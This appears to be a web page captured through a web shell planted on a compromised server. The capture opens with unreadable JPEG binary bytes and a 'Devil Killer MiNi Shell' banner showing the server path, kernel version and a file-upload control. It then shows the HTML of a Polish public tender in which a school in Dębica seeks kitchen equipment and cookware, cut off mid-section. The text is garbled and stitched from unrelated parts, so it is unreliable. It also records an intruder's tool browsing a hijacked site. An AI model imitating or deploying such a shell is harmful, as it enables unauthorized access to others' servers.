JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250602/0025901001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wraz z montażem do 3 pracowni gastronomicznych w Techn. nr 3 w ZSE w Dębicy w ramach projektu współfin. ze środków UE pn. Nowoczesny zawodowiec-szansą na przyszłość </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Ekonomicznych im. Janusza Korczaka w Dębicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000229808</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ogrodowa 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dębica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">146702574</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">146702574</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ekonomik@zsedebica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsedebica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wraz z montażem do 3 pracowni gastronomicznych w Techn. nr 3 w ZSE w Dębicy w ramach projektu współfin. ze środków UE pn. Nowoczesny zawodowiec-szansą na przyszłość </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cdc9db6f-1335-497c-8108-62b140914131</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00259010</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00212864/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa wraz z montażem do 3 pracowni gastronomicznych w Techn. nr 3 w ZSE w Dębicy w ramach projektu współfin. ze środków UE pn. Nowoczesny zawodowiec-szansą na przyszłość</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Nowoczesny zawodowiec – szansą na przyszłość” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-cdc9db6f-1335-497c-8108-62b140914131 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1)	W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej za pośrednictwem Platformy pod adresem:<br/>https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">–	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; <br/>–	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>–	zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer; <br/>–	włączona obsługa JavaScript; <br/>–	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>–	Szyfrowanie na https://ezamowienia.gov.pl odbywa się za pomocą protokołu TLS 1.3; <br/>–	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi. <br/>2)	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywających na Zamawiającym; <br/>3)	Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 18 oraz art. 78 ust. 1 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej. <br/>4)	Dane osobowe Wykonawcy będą przechowywane na podstawie Rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz.U.2011.14.67) przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia lub przez okres 10 lat w przypadku umowy o zamówienie publiczne. <br/>5)	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>–	administratorem Pani/Pana danych osobowych jest Zespół Szkół Ekonomicznych im. Janusza Korczaka w Dębicy, ul. Ogrodowa 20, 39-200 Dębica; <br/>–	wyznaczyliśmy inspektora ochrony danych, z którym może Pani/Pan kontaktować się we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych poprzez email: jakub@broton.pl lub pisemnie na adres Zamawiającego;<br/>–	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp.<br/>–	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO. <br/>6)	Zamawiający nie planuje przetwarzania danych osobowych Wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO. <br/>7)	Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą: <br/>–	obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego; <br/>–	obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane Wykonawca pozyskał w sposób pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSE.26.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 495122 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W niniejszym opisie przedmiotu zamówienia przedstawiono minimalne wymagania dotyczące wyposażenia, które muszą być spełnione. Wykonawcy mogą przedstawić oferty równoważne, jednakże proponowany przez wykonawcę sprzęt równoważny musi charakteryzować się takimi samymi parametrami funkcjonalno-użytkowymi jak produkty opisane poniżej lub je przewyższać. Proponowany sprzęt musi spełniać wymagane parametry wymiarowe i techniczne podane w opisie poszczególnych pozycji sprzętu poniżej. Jakiekolwiek wskazane w opisie przedmiotu zamówienia, nazwy produktów lub ich producenci mają na celu jedynie przybliżenie wymagań, których nie można było opisać przy pomocy dostatecznie dokładnych i zrozumiałych określeń. W przypadku zastosowania produktów równoważnych, Wykonawca zobowiązany jest do przedstawienia szczegółowej dokumentacji technicznej potwierdzającej zgodność z wymaganiami.<br/>Wymagania dotyczące przedmiotu zamówienia<br/>1.	Oferowany produkt nie może być prototypem musi być produktem istniejącym na rynku w obrocie.<br/>2.	Wymagane wraz z ofertą podanie modelu oraz producenta oferowanego produktu.<br/>3.	Koszt dostawy, rozładunku i montażu pokrywa Wykonawca.<br/>4.	Klasa energetyczna minimum C zgodnie lub równoważna<br/>5.	Dostarczone urządzenia muszą być wyposażone w następujące dokumenty:<br/>a) Deklarację zgodności producenta CE,<br/>b) Dokument gwarancyjny,<br/>c) Instrukcję obsługi w języku polskim,<br/>d) Atest PZH lub deklarację zgodności higienicznej z dopuszczeniem do zastosowań w gastronomii,<br/>e) Wymagany jest montaż i szkolenie z obsługi przez autoryzowany serwis techniczny – jako załącznik do oferty należy przedstawić certyfikaty autoryzacji producentów oferowanych urządzeń.<br/><br/>1.	BASEN NIERDZEWNY GASTRONOMICZNY – 1 SZT.<br/>2.	STÓŁ CHŁODNICZY – 2 SZT.<br/>3.	STÓŁ NIERDZEWNY, GASTRONOMICZNY – 2 SZT. <br/>4.	STÓŁ NIERDZEWNY GASTRONOMICZNY – 2 SZT.<br/>5.	STÓŁ NIERDZEWNY GASTRONOMICZNY – 2 SZT.<br/>6.	STÓŁ NIERDZEWNY GASTRONOMICZNY – 2 SZT.<br/>7.	STÓŁ NIERDZEWNY GASTRONOMICZNY – 2 SZT.<br/>8.	STÓŁ CATERINGOWY - 10 SZT.<br/>9.	STÓŁ KOKTAJLOWY – 15 SZT. <br/>10.	BATERIA GASTRONOMICZNA – 4 SZT. <br/>11.	BATERIA GASTRONOMICZNA - 1 SZT.<br/>12.	KUCHNIA ELEKTRYCZNA GASTRONOMICZNA - 4 SZT.<br/>13.	POJEMNIK NA ODPADY - 4 SZT. <br/>14.	SALAMANDER – 1 SZT.<br/>15.	NALEŚNIKARKA – 1 SZT.<br/>16.	CZAJNIK ELEKTRYCZNY – 4 SZT.<br/>17.	BLENDER KUCHENNY – 4 SZT.<br/>18.	ROBOT KUCHENNY – 4 SZT.<br/>19.	ZMYWARKA GASTRONOMICZNA – 1 SZT.<br/>20.	ZAMRAŻARKA GASTRONOMICZNA – 1 SZT.<br/>21.	EKSPRES DO KAWY AUTOMATYCZNY – 1 SZT.<br/>22.	EKSPRES DO KAWY CIŚNIENIOWY – 1 SZT. <br/>23.	MŁYNEK ŻARNOWY DO KAWY – 1 SZT.<br/>24.	NAŚWIETLACZ DO JAJ – 1 SZT.<br/>25.	WARNIK DO WODY – 2 SZT.<br/>26.	URZĄDZENIE DO GOTOWANIA RYŻU – 1 SZT.<br/>27.	FRYTOWNICA BEZTŁUSZCZOWA – 1 SZT.<br/>28.	KUCHENKA MIKROFALOWA – 1 SZT. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39314000-6 - Przemysłowy sprzęt kuchenny</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39711200-1 - Roboty kuchenne</p> <p class="mb-0">39713100-4 - Zmywarki do naczyń</p> <p class="mb-0">39711120-6 - Zamrażarki</p> <p class="mb-0">39711310-5 - Elektryczne zaparzacze do kawy</p> <p class="mb-0">39711211-1 - Miksery kuchenne</p> <p class="mb-0">39721000-2 - Urządzenia do gotowania lub grzewcze używane w gospodarstwie domowym</p> <p class="mb-0">39711300-2 - Urządzenia elektrotermiczne</p> <p class="mb-0">39710000-2 - Elektryczny sprzęt gospodarstwa domowego</p> <p class="mb-0">39711100-0 - Chłodziarki i zamrażarki</p> <p class="mb-0">39711362-4 - Kuchenki mikrofalowe</p> <p class="mb-0">39151200-7 - Stoły robocze</p> <p class="mb-0">42130000-9 - Krany, kurki, zawory i podobna armatura</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100punktowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W niniejszym opisie przedmiotu zamówienia przedstawiono minimalne wymagania dotyczące wyposażenia, które muszą być spełnione. Wykonawcy mogą przedstawić oferty równoważne, jednakże proponowany przez wykonawcę sprzęt równoważny musi charakteryzować się takimi samymi parametrami funkcjonalno-użytkowymi jak produkty opisane poniżej lub je przewyższać. Proponowany sprzęt musi spełniać wymagane parametry wymiarowe i techniczne podane w opisie poszczególnych pozycji sprzętu poniżej. Jakiekolwiek wskazane w opisie przedmiotu zamówienia, nazwy produktów lub ich producenci mają na celu jedynie przybliżenie wymagań, których nie można było opisać przy pomocy dostatecznie dokładnych i zrozumiałych określeń. W przypadku zastosowania produktów równoważnych, Wykonawca zobowiązany jest do przedstawienia szczegółowej dokumentacji technicznej potwierdzającej zgodność z wymaganiami.<br/>Wymagania dotyczące przedmiotu zamówienia<br/>1.	Oferowany produkt nie może być prototypem musi być produktem istniejącym na rynku w obrocie.<br/>2.	Wymagane wraz z ofertą podanie modelu oraz producenta oferowanego produktu.<br/>3.	Koszt dostawy, rozładunku i montażu pokrywa Wykonawca.<br/>4.	Dostarczone urządzenia muszą być wyposażone w następujące dokumenty:<br/>a) Deklarację zgodności producenta CE,<br/>b) Dokument gwarancyjny,<br/>c) Instrukcję obsługi w języku polskim,<br/>d) Atest PZH lub deklarację zgodności higienicznej z dopuszczeniem do zastosowań w gastronomii,<br/>e) Wymagany jest montaż i szkolenie z obsługi przez autoryzowany serwis techniczny – jako załącznik do oferty należy przedstawić certyfikaty autoryzacji producentów oferowanych urządzeń.<br/><br/>1.	Komplet garnków ze stali nierdzewnej <br/>2.	PATELNIA WOK – 1 SZT.<br/>3.	Komplet patelni z pokrywkami <br/>4.	Komplet rondli z pokrywkami ze stali nierdzewnej <br/>5.	Komplet dużych garczków z pokrywkami ze stali nierdzewnej <br/>6.	Patelnie do naleśników <br/>7.	Kompletna zastawa stołowa porcelanowa w ilości 4 komplety. <br/>8.	Kompletna zastawa stołowa szklana w ilości 4 komplety<br/>9.	Sosjerki z podstawkami o pojemności 150 ml z metalową łyżką sosową – 8 kompletów<br/>10.	Sosjerki z podstawkami o pojemności 250 ml z metalową łyżką sosową – 8 kompletów<br/>11.	Kompletna zastawa stołowa metalowa w ilości 4 komplety. Wykonana ze stali nierdzewnej. Zastawa metalowa dostosowana do mycia w zmywarce. <br/>12.	Zestaw noży gastronomicznych HACCP – 4 zestawy. <br/>13.	Komplet desek HACCP ze stojakiem – 8 kompletów. <br/>14.	Tarki do jarzyn czterostronne o różnych oczkach. Wykonane ze stali nierdzewnej 18/10, wzmocniona konstrukcja, możliwość mycia w zmywarce. Wymiary wysokość minimum 200 mm, szerokość minimum 65 mm długość minimum 90 mm – 8 sztuk<br/>15.	Komplet łyżek silikonowych do mieszania – 8 kompletów. <br/>16.	Komplet sitek metalowych – 4 komplety. <br/>17.	Cedzak z miską z tworzywa sztucznego (polipropylen) odpornego na wysokie temperatury, pojemność miski min. 3 l, średnica misy Ø 230 mm, cedzak wyposażony w uchwyty, wymiary miski min. 24x24x12 cm, wymiary cedzaka min. 29x23x11 cm – 4 komplety<br/>18.	Wałek do ciasta gastronomiczny, drewniany na łożyskach kulkowych o długości min. 300 mm (max 400 mm), szerokości min. 90 mm – 4 sztuki (8 sztuk)<br/>19.	Wagi kuchenne cyfrowe do 5 kg <br/>20.	Miarki o różnej pojemności – 8 kompletów. <br/>21.	Miski metalowe ze stali nierdzewnej 18/10, polerowanej – 4 komplety. <br/>22.	Zestaw blach GN do pieca konwekcyjno–parowego – 1 komplet. <br/>23.	Wyciskacz do czosnku z polerowanej stali nierdzewnej 18/10. Długość praski min. 170 mm, szerokość min. 30 mm, wysokość min. 20 mm. Wyjmowane sito ze stali nierdzewnej o perforacji 1,5 mm – 8 sztuk<br/>24.	Łyżki cedzakowe wykonane ze stali nierdzewnej – 4 komplety. <br/>25.	Rękawice kuchenne (ochronne) z bawełny o wytrzymałości na temperaturę min. do 250 O C, posiadające ochronę przeciw płomieniową. Długość rękawic min. 400 mm, szerokość min. 230 mm, wysokość min. 30 mm, gramatura min. 600 g/m2 – 4 komplety<br/>26.	Naczynia żaroodporne szklane – 8 kompletów. <br/>27.	Formy do budyniu – 1 komplet. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39221100-8 - Zastawa kuchenna</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39221200-9 - Zastawa stołowa</p> <p class="mb-0">39241110-7 - Noże stołowe</p> <p class="mb-0">39223000-1 - Łyżki, widelce</p> <p class="mb-0">38310000-1 - Wagi precyzyjne</p> <p class="mb-0">18143000-3 - Akcesoria ochronne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający 